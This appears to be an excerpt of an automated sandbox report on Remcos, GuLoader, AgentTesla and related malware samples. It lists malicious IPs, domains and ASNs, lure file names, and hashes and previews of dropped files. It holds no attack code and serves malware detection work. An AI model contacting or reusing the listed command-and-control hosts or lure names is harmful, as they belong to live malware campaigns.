178.237.33.50 | bYPQHxUNMF.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | doc.bat | malicious | GuLoader, Remcos | geoplugin.net/json.gp
178.237.33.50 | New Order.xla.xlsx | malicious | Remcos | geoplugin.net/json.gp

Context: Domains
Match | Associated sample name / URL | Detection | Threat name | Context
yuahdgbceja.sytes.net | 202404294766578200.xlam.xlsx | malicious | Remcos | 23.94.53.100
geoplugin.net | INQUIRY#46789-APRIL24_MAT_PRODUC_SAMPLE_PRODUCT.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | Evgh. rvs Armenia. 30.04.2024.exe | malicious | GuLoader, Remcos | 178.237.33.50
geoplugin.net | 202404294766578200.xlam.xlsx | malicious | Remcos | 178.237.33.50
geoplugin.net | PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.hta | malicious | GuLoader, Remcos | 178.237.33.50
geoplugin.net | nU7Z8sPyvf.rtf | malicious | Remcos | 178.237.33.50
geoplugin.net | Tapril-30-receipt.vbs | malicious | Remcos | 178.237.33.50
geoplugin.net | Tapril-30-receipt.vbs | malicious | Remcos | 178.237.33.50
geoplugin.net | bYPQHxUNMF.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | doc.bat | malicious | GuLoader, Remcos | 178.237.33.50
geoplugin.net | New Order.xla.xlsx | malicious | Remcos | 178.237.33.50

Context: ASNs
Match | Associated sample name / URL | Detection | Threat name | Context
AS-COLOCROSSINGUS | Notice.xls | malicious | Unknown | 192.3.239.4
AS-COLOCROSSINGUS | irlsheis.doc | malicious | AgentTesla, PureLog Stealer | 192.3.239.4
AS-COLOCROSSINGUS | Order Request1_5_24.xlam.xlsx | malicious | AgentTesla, PureLog Stealer, RedLine | 23.94.54.101
AS-COLOCROSSINGUS | 202404294766578200.xlam.xlsx | malicious | Remcos | 23.94.53.100
AS-COLOCROSSINGUS | OWrVfOdM62.rtf | malicious | AgentTesla, PureLog Stealer | 192.3.239.4
AS-COLOCROSSINGUS | ET2431000075 & ET2431000076.xls | malicious | AgentTesla, PureLog Stealer | 192.3.239.4
AS-COLOCROSSINGUS | nU7Z8sPyvf.rtf | malicious | Remcos | 107.172.31.6
AS-COLOCROSSINGUS | SecuriteInfo.com.Linux.Siggen.9999.4824.4127.elf | malicious | Gafgyt, Mirai | 23.94.151.97
AS-COLOCROSSINGUS | QF3YL9rOxB.rtf | malicious | AgentTesla | 192.3.243.154
AS-COLOCROSSINGUS | attachment.xlam.xlsx | malicious | AgentTesla, PureLog Stealer, RedLine | 23.94.54.101
ATOM86-ASATOM86NL | INQUIRY#46789-APRIL24_MAT_PRODUC_SAMPLE_PRODUCT.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | Evgh. rvs Armenia. 30.04.2024.exe | malicious | GuLoader, Remcos | 178.237.33.50
ATOM86-ASATOM86NL | 202404294766578200.xlam.xlsx | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.hta | malicious | GuLoader, Remcos | 178.237.33.50
ATOM86-ASATOM86NL | https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:c2e8c3b1-63be-4a97-a3b9-a21649a6fcff | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | nU7Z8sPyvf.rtf | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | Tapril-30-receipt.vbs | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | Tapril-30-receipt.vbs | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | bYPQHxUNMF.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | doc.bat | malicious | GuLoader, Remcos | 178.237.33.50

Context: JA3 fingerprints and dropped files
No context
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):0.9908841311634949
              Encrypted:false
              SSDEEP:192:hKFEz1JwS0YrZkCrjvZrbBvwzuiFKZ24IO8KR:IFSJwZYrZkCrjQzuiFKY4IO8KR
              MD5:27F8D24BEFC0A69510CB9558A1BA72C0
              SHA1:6492B48ED9B4BE46590A65786C41A712CDDDC037
              SHA-256:AE2763A822C744C7C2248FB2CD65FA646A243CDCEA551E85D95FB72A5434F4AE
              SHA-512:F06A7252261C1ACB6448EE098D4F2569159178ECB21BF1AA12B953AFBD448A177AEDEC15D214D9B2320FE8624B15F9AC9B066C35DC5D737C3DB750818CF5BB02
              Malicious:false
              Reputation:low
              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.9.1.2.8.9.9.7.7.5.3.0.5.4.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.9.1.2.8.9.9.8.2.9.9.9.2.9.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.f.9.8.f.8.0.5.-.9.7.9.e.-.4.0.a.c.-.b.8.4.8.-.9.5.f.f.2.3.a.c.c.2.e.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.c.3.7.a.6.7.d.-.e.b.5.c.-.4.3.8.f.-.a.7.4.8.-.a.a.7.3.9.8.6.4.2.a.c.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.v.c.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.s.v.c.h.o.s.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.c.8.-.0.0.0.1.-.0.0.1.5.-.0.8.8.4.-.b.5.0.6.9.2.9.c.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.3.1.9.6.f.4.5.b.2.6.9.a.6.1.4.a.3.9.2.6.e.f.c.0.3.2.f.c.9.d.7.5.0.1.7.f.2.7.e.
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):0.9911070271944696
              Encrypted:false
              SSDEEP:192:7q+Kx+Ez1Jpu0qG2GMAjvZrbBvwzuiFKZ24IO8KR:u+KESJpVqGPMAjQzuiFKY4IO8KR
              MD5:46C65D7B8DC1308E63186F7288000E17
              SHA1:54252ED55CA84466F348366E0000F664601BC00A
              SHA-256:DBC5DF40AD6E09535807B425DA6A334CD5B00BF6363A230BFB77CA3A710D86E1
              SHA-512:61F7F0F0CD97CBFB7ECCF748FF6ADBBAF4591B3CA3891CCF5FD97AAF036369A9EB1406C6F60CA54FEC7C862E248117BD074379E6566A59363518A29AAAD6C399
              Malicious:false
              Reputation:low
              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.9.1.2.9.0.0.6.0.3.2.8.0.2.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.9.1.2.9.0.0.6.8.2.9.6.8.5.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.5.1.1.f.1.3.d.-.c.1.c.7.-.4.8.e.1.-.a.a.e.d.-.6.6.d.b.8.b.4.a.8.3.0.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.6.6.a.e.9.4.7.-.c.7.1.6.-.4.4.7.3.-.9.3.1.6.-.4.d.b.4.4.a.0.3.b.d.6.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.v.c.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.s.v.c.h.o.s.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.c.8.-.0.0.0.1.-.0.0.1.5.-.0.8.8.4.-.b.5.0.6.9.2.9.c.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.3.1.9.6.f.4.5.b.2.6.9.a.6.1.4.a.3.9.2.6.e.f.c.0.3.2.f.c.9.d.7.5.0.1.7.f.2.7.e.
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:Mini DuMP crash report, 14 streams, Thu May 2 13:09:58 2024, 0x1205a4 type
              Category:dropped
              Size (bytes):139466
              Entropy (8bit):1.7339115721187133
              Encrypted:false
              SSDEEP:384:EGG0W0VmBu5NvsJ+zWOsIRM9QB4qwYs8PHgaDf9Tja/nOoMyFT:EP0fVmBu5NvsJ+zdPR8QByx8vjCEyF
              MD5:F0DF7F2C48AECE9C97D5341E8D855A50
              SHA1:C8EC333B7200BD290E4DF7E6E92819C9B1341A1D
              SHA-256:42CF64131E6C85E6F1AC80FAE6FC13100E49DF170E0493D6231604FAE4234824
              SHA-512:8CE00B81B834AB7EEBAD724A23D090B9EFA5823F229BBADF6A2A5E651C39CE75CDD2BF210AF99F92C1013B940DAD6219F7F1B1A9D226DEFE4DBFB5578451C975
              Malicious:false
              Reputation:low
              Preview:MDMP..a..... .........3f....................................D...$T..........T.......8...........T............7..............P!..........<#..............................................................................eJ.......#......GenuineIntel............T.............3f.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
              Category:dropped
              Size (bytes):6312
              Entropy (8bit):3.715439962806717
              Encrypted:false
              SSDEEP:192:R6l7wVeJ746cEYpnEuZbeprp89b3AsfFgdm:R6lXJk6PYpnEuZJ3TfFn
              MD5:0B05CB517001DF797EBAC2B1C37ED4AB
              SHA1:749C3B3AE13DC93FFCA4761A3D7DF215DE81F1D7
              SHA-256:488FA5FAB5A639716D898B61C03BBBB1D89D3668EB56895819032A50621F0632
              SHA-512:4781D87A1F58670E3103AB736105371F650B4DE6BEC3A6253E178FE9D35C766B40EA8F6D0505720A2457AC6626234F7B4802892F6323D4F9931D1E7824D69254
              Malicious:false
              Reputation:low
              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.2.4.8.<./.P.i.
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):4655
              Entropy (8bit):4.450591405528264
              Encrypted:false
              SSDEEP:48:cvIwWl8zsWJg77aI9wjLWpW8VYoybYm8M4JCFLFJq+q8+ED0Bd:uIjfsI7Wj67VFpJCdqID0Bd
              MD5:ADF3EB64E57919812DA05CF699F11706
              SHA1:ADFAEE81EAE9E70204357DE82F56E314C49D5993
              SHA-256:AA4ADF4CCFBF27C054815D19B095B4C00B834A32AA664CF9C69EE15D70E2B229
              SHA-512:781258F64C767AFA64C8788D1699B6AC4DC915CEB1E699063A8484E68AAF95D52B91690F8E2721E0C9DC437B6AFA57E5B55804DAD2F414A38CEA197F5D898C88
              Malicious:false
              Reputation:low
              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="305532" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:Mini DuMP crash report, 14 streams, Thu May 2 13:10:06 2024, 0x1205a4 type
              Category:dropped
              Size (bytes):135784
              Entropy (8bit):1.7512160344777987
              Encrypted:false
              SSDEEP:384:xfWG0W0VmdZu518kZYg+yWOdADjOqwYs8PHuaAAWGBqm7i3p:pf0fVm7u5KgYg+ydyDjAx83HBo
              MD5:56704161B993132615A4C5C34D47F95F
              SHA1:3894A3D1CD858F7ECE50EB28BDAEFD9F68E28588
              SHA-256:A769FA47E2ED7D8C8A7E67728CBC15B1F6FB64AB612B176CA6A5DE781F230827
              SHA-512:EC0FD2AEFFC3BFD85E99A5553F4D11032484CF3508ED9F71D362DCF8AB4D6D3572B46241FC6E39CE0807D1DD16A7F46144469B3F301ADA5A6794E8B48F0CD1DB
              Malicious:false
              Reputation:low
              Preview:MDMP..a..... .........3f....................................t...$T..........T.......8...........T............7..............P!..........<#..............................................................................eJ.......#......GenuineIntel............T.............3f.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
              Category:dropped
              Size (bytes):6312
              Entropy (8bit):3.7145042097004186
              Encrypted:false
              SSDEEP:192:R6l7wVeJ746rYpnAAMepDB89bsAsfT+XEm:R6lXJk6rYpnAbsTfT+h
              MD5:765313AF787D64F3C9502D34D8761089
              SHA1:5289E2E12CBAFD101695564A49C8BAF71E81CEB8
              SHA-256:88BDB98FC41B3357076284E4FE53B498B3B8DF0907B27CD1011C2B7111E4B6A1
              SHA-512:3E4C2DDBA4686287C2ECA2C0C31032DBE384CE793F2519FB48938932DB8CD5A3CC0AD7C6C28AAE236766ABAE2ED47CB9810C72CAFDB54A18C8CB0CC42555600F
              Malicious:false
              Reputation:low
              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.2.4.8.<./.P.i.
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):4655
              Entropy (8bit):4.4515084324754
              Encrypted:false
              SSDEEP:48:cvIwWl8zsWJg77aI9wjLWpW8VYoePYm8M4JCFpFD+q88ED0Bd:uIjfsI7Wj67VFeSJC5eD0Bd
              MD5:FD84273EEFC9C46279BEB3594BFB2A3C
              SHA1:F7C6B2E652AE0DE9252A6C8ED133D4AD36294A7D
              SHA-256:EBE856B44E537D1D44781073E44132E9C31813EFB452F75579BD644DFE0B83E2
              SHA-512:31E8C6675455A7F278985EF61E885BF52B640AB69276FAF4395785638ADE8928B4E77EBBEE570FBB25318EFA5CA36321A4132CAF4AEDF2ADE24C0804D819A2E0
              Malicious:false
              Reputation:low
              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="305532" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
              Process:C:\Windows\SysWOW64\svchost.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):965
              Entropy (8bit):5.025809437493847
              Encrypted:false
              SSDEEP:12:tkhXkmnd61GkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qhXldluKyGX85jvXhNlT3/7AcV9Wro
              MD5:85152B3860306466F9B8AABA05FE62FA
              SHA1:CB2407B7EE570697BD97C1D9FA07EA7E10412D1B
              SHA-256:DD5D42EF9E0485E502C4E66A32ADBD4A4EF49528109BDE8E4DC1113C2DA6F86A
              SHA-512:F87F7420DA5055C72CF21153447C270A130855C84EE094A974E80A7F1EFDD9D960FFE27692A26954F2A746BACC821561625F1EE2C396DFBFFB2F6C1EE859D2DC
              Malicious:false
              Preview:{. "geoplugin_request":"191.96.150.225",. "geoplugin_status":200,. "geoplugin_delay":"3ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
              Process:C:\Users\user\AppData\Local\silvexes\deblaterate.exe
              File Type:data
              Category:dropped
              Size (bytes):415558
              Entropy (8bit):7.980802161270596
              Encrypted:false
              SSDEEP:6144:B5V2kSfdEVJBkA8liRllAjk0/5F2m0SDEHPTmXWbdChTm+1hEDubJUoztcl8cC2h:rYkS1KWA8SbZ0F24gRsp1mD27tcy+
              MD5:6167A7957E72F9B3A53C5667A7C56057
              SHA1:00AC978BFF6FA30F4429ECD8810460642C5767B0
              SHA-256:26939E2779D04E0E5CC020694B7EAF38525FD40E13E06DB165C08449A13FA347
              SHA-512:0D705C994C7405358EB5531A5A19CC8A1EC1CCF2E25D76CAA2C7A368DA474FC1E65B688E79F1D978B079057B99B9D43D3954AAFD32553276CE0595B12C366CF8
              Malicious:false
              Preview:EA06.........b.5.R..nO:.J.V+Up..i..M...U*h...P...Z..+U.?.w4.O.q|M........V.8..h..=..9.Nf.Z_..P....j...B......(.....:8......_4X.LCm.m.Q*E.a..i'..6...r*..|sa.F......x-.9.....l...U.a.t.......<...;.H.r!..N..&.s..J.7.O....{...2.d,...3.4..1.X..3K.H........G.....gJ...U@..uf....o?.R....^.N.-.7.M*iH..;.....6...J.^.I..@..}*j.....i6....X.mf..$.m!..iUz.p.......;...:...q.........i_..j..... ._.=..V(@..7.L..@....SP...5B..g...M].Md....iJ.L..~..b.7.O.5Y.Vm6...)NUJ.L..x....?...B....l..\"..-6.4...........1Q..j.......%6i6.........t.V..i]N......@.i.V)....b....r...y.......(.<R&@...*5D..d...c-l.-:...(.x.W..>8..............EH..2*..;Z../si.O._!......I.p..z.......>+...<`X%f.5..6V{}>km.......4..x`...7.N&4..JO...+.).*...L~...~.....I.&.s..P*.j....oP.z...W#.X.cI.Rf..."....6Q*E2k\...sn...7.@.*f2.....K.*i0..#.....7.[._=U..h.x&.I.D.i..-Ri.7ez..5...2.I.3^.2.5.Z1?:d^;W.igSJUr.I.R.TKuf....4.P...E.Z; .M..j.R....B...@iSJ.J...w#V.b+..R...5....kUy...q.w#...*'.....gwsE.M...>i..X
              Process:C:\Users\user\AppData\Local\silvexes\deblaterate.exe
              File Type:data
              Category:dropped
              Size (bytes):9916
              Entropy (8bit):7.600038819371061
              Encrypted:false
              SSDEEP:192:m+cKumbG02JtWU+F6xcj8DiqAEgADXuLKZRvVE8ZGD/Lr6mjNAEOLiX:97umbGRJtWjAuYipVkX2KZ/E8ZGD/XVf
              MD5:85EC07A5B813744D5460158A4F4C3B75
              SHA1:9A40D20BD37344BB771FA10D81E813397AEA3B90
              SHA-256:64B6B2C25F3830B385DC1E421742721FA60298892200EDF21BCC1DE44C9DDEFC
              SHA-512:0D591CF85239BC1E138DBE0A877F26FABB2EE5924BEA0195488FF7816DFDCEB2D6EF5A864A424004C82671EC57F41C455A774822A7A3D75341B44B5AD7A3099C
              Malicious:false
              Preview:EA06..t0.M'.)..e4.N'.).......T9..l.0L.s.5..3..s.4.8.......k8.Yls....c..&S...k6...S....1.L&.i..i5.M,S....K.@...7...p. ....P.o...m.X.V........9....3...f....s2.Xf@.]..g3@..h.m.M.......8.l..6.....a........i4........g3Y...c ._..k4...d....H, ......Ac.H..g...(.F..=d....>....C`....@02..N@...u......Y..ab.M.]>.$....M.x>;$....N.j.;%....X.j.;%......j.;,....P'.b.5... .^..f./Z..@F.6.z..G......`......i..G../Z...zqd...l.;.........|......7...}3{(........;^..l =..p.........3p.o....,.......x.....H<.lX.:...b.....,. ...2...f.[...K.)....b..i|v F......X......`....,.9....5...._..l......>K.....ir.e....[4..d..f.y.....,.....S >..p...........s9.... !..Y....f...ja4....ea.h,.p.....,.a8.,..3........f.....f ....,j.0..&...J......f ....6K%.ke..f....L..;2.X...4.Y.V@.Fn.....f@....l..05.....!;3.X...c )D.g6... ...'&`....,f.6..&....r...Brh.....l...i2...B....@.......d.L.`!.....P...@X5d..lSK...9...!;5.X...cVY......'.B...,vl.!..>.a..l...M..@...X...b.M&.X..B.a.Q...sp..X..9..o5..f.!...,vn......d...
              Process:C:\Users\user\AppData\Local\silvexes\deblaterate.exe
              File Type:data
              Category:dropped
              Size (bytes):415558
              Entropy (8bit):7.980802161270596
              Encrypted:false
              SSDEEP:6144:B5V2kSfdEVJBkA8liRllAjk0/5F2m0SDEHPTmXWbdChTm+1hEDubJUoztcl8cC2h:rYkS1KWA8SbZ0F24gRsp1mD27tcy+
              MD5:6167A7957E72F9B3A53C5667A7C56057
              SHA1:00AC978BFF6FA30F4429ECD8810460642C5767B0
              SHA-256:26939E2779D04E0E5CC020694B7EAF38525FD40E13E06DB165C08449A13FA347
              SHA-512:0D705C994C7405358EB5531A5A19CC8A1EC1CCF2E25D76CAA2C7A368DA474FC1E65B688E79F1D978B079057B99B9D43D3954AAFD32553276CE0595B12C366CF8
              Malicious:false
              Preview:EA06.........b.5.R..nO:.J.V+Up..i..M...U*h...P...Z..+U.?.w4.O.q|M........V.8..h..=..9.Nf.Z_..P....j...B......(.....:8......_4X.LCm.m.Q*E.a..i'..6...r*..|sa.F......x-.9.....l...U.a.t.......<...;.H.r!..N..&.s..J.7.O....{...2.d,...3.4..1.X..3K.H........G.....gJ...U@..uf....o?.R....^.N.-.7.M*iH..;.....6...J.^.I..@..}*j.....i6....X.mf..$.m!..iUz.p.......;...:...q.........i_..j..... ._.=..V(@..7.L..@....SP...5B..g...M].Md....iJ.L..~..b.7.O.5Y.Vm6...)NUJ.L..x....?...B....l..\"..-6.4...........1Q..j.......%6i6.........t.V..i]N......@.i.V)....b....r...y.......(.<R&@...*5D..d...c-l.-:...(.x.W..>8..............EH..2*..;Z../si.O._!......I.p..z.......>+...<`X%f.5..6V{}>km.......4..x`...7.N&4..JO...+.).*...L~...~.....I.&.s..P*.j....oP.z...W#.X.cI.Rf..."....6Q*E2k\...sn...7.@.*f2.....K.*i0..#.....7.[._=U..h.x&.I.D.i..-Ri.7ez..5...2.I.3^.2.5.Z1?:d^;W.igSJUr.I.R.TKuf....4.P...E.Z; .M..j.R....B...@iSJ.J...w#V.b+..R...5....kUy...q.w#...*'.....gwsE.M...>i..X
              Process:C:\Users\user\AppData\Local\silvexes\deblaterate.exe
              File Type:data
              Category:dropped
              Size (bytes):9916
              Entropy (8bit):7.600038819371061
              Encrypted:false
              SSDEEP:192:m+cKumbG02JtWU+F6xcj8DiqAEgADXuLKZRvVE8ZGD/Lr6mjNAEOLiX:97umbGRJtWjAuYipVkX2KZ/E8ZGD/XVf
              MD5:85EC07A5B813744D5460158A4F4C3B75
              SHA1:9A40D20BD37344BB771FA10D81E813397AEA3B90
              SHA-256:64B6B2C25F3830B385DC1E421742721FA60298892200EDF21BCC1DE44C9DDEFC
              SHA-512:0D591CF85239BC1E138DBE0A877F26FABB2EE5924BEA0195488FF7816DFDCEB2D6EF5A864A424004C82671EC57F41C455A774822A7A3D75341B44B5AD7A3099C
              Malicious:false
